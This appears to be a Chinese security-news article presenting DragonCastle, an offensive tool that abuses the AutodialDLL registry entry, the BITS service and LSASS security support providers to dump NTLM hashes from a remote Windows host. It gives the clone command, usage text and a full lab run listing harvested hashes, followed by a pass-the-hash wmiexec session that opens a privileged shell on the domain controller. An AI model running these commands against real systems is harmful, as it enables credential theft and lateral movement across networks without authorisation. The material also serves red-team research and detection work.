关于DragonCastle
DragonCastle是一款结合了AutodialDLL横向渗透技术和SSP的安全工具,该工具旨在帮助广大研究人员从LSASS进程中提取NTLM哈希。
该工具会向目标设备中上传一个DLL,然后它会启用远程注册表功能以修改AutodialDLL条目并启动/重启BITS服务。Svchosts将负责加载我们上传的DLL,再次将AutodialDLL设置为默认值,并执行RPC请求以强制LSASS加载与安全支持提供程序相同的DLL。一旦LSASS加载了DLL,它就会在进程内存中进行搜索,以提取NTLM哈希和密钥/IV。
支持的操作系统版本
操作系统版本 | 支持状态 |
---|---|
Windows 10 version 21H2 | |
Windows 10 version 21H1 | 支持 |
Windows 10 version 20H2 | 支持 |
Windows 10 version 20H1 (2004) | 支持 |
Windows 10 version 1909 | 支持 |
Windows 10 version 1903 | 支持 |
Windows 10 version 1809 | 支持 |
Windows 10 version 1803 | 支持 |
Windows 10 version 1709 | 支持 |
Windows 10 version 1703 | 支持 |
Windows 10 version 1607 | 支持 |
Windows 10 version 1511 | |
Windows 10 version 1507 | |
Windows 8 | |
Windows 7 |
工具下载
该工具的运行需要使用到Python 3环境,因此我们首先需要在本地设备上安装并配置好Python 3环境。广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/mdsecactivebreach/DragonCastle.git
(向右滑动,查看更多)
工具使用帮助
psyconauta@insulanova:~/Research/dragoncastle|⇒ python3 dragoncastle.py -h DragonCastle - @TheXC3LL
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
DragonCastle - A credential dumper (@TheXC3LL)
optional arguments:
-h, --help 显示工具帮助信息和退出
-u USERNAME, --username USERNAME 有效用户名
-p PASSWORD, --password PASSWORD 有效密码
-d DOMAIN, --domain DOMAIN 有效域名
-hashes [LMHASH]:NTHASH NT/LM 哈希
-no-pass 不询问密码
-k 使用Kerberos身份验证
-dc-ip ip address 域控制器的IP地址
-target-ip ip address 目标设备的IP地址
-local-dll dll to plant 待上传的DLL本地文件路径
-remote-dll dll location 更新AutodialDLL 注册表项值的远程路径
(向右滑动,查看更多)
工具使用样例
Windows服务器地址为192.168.56.20,域控制器地址为192.168.56.10:
psyconauta@insulanova:~/Research/dragoncastle|⇒ python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
============
[+] Deleting DLL
[^] Have a nice day!
(向右滑动,查看更多)
psyconauta@insulanova:~/Research/dragoncastle|⇒ wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:>whoami
sevenkingdoms\eddard.starkC:>whoami /priv
PRIVILEGES INFORMATION
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
C:>
(向右滑动,查看更多)
项目地址
DragonCastle:https://github.com/mdsecactivebreach/DragonCastle
参考资料
https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
https://adepts.of0x.cc/physical-graffiti-lsass/
https://blog.xpnsec.com/exploring-mimikatz-part-2/
https://twitter.com/TheXC3LL
精彩推荐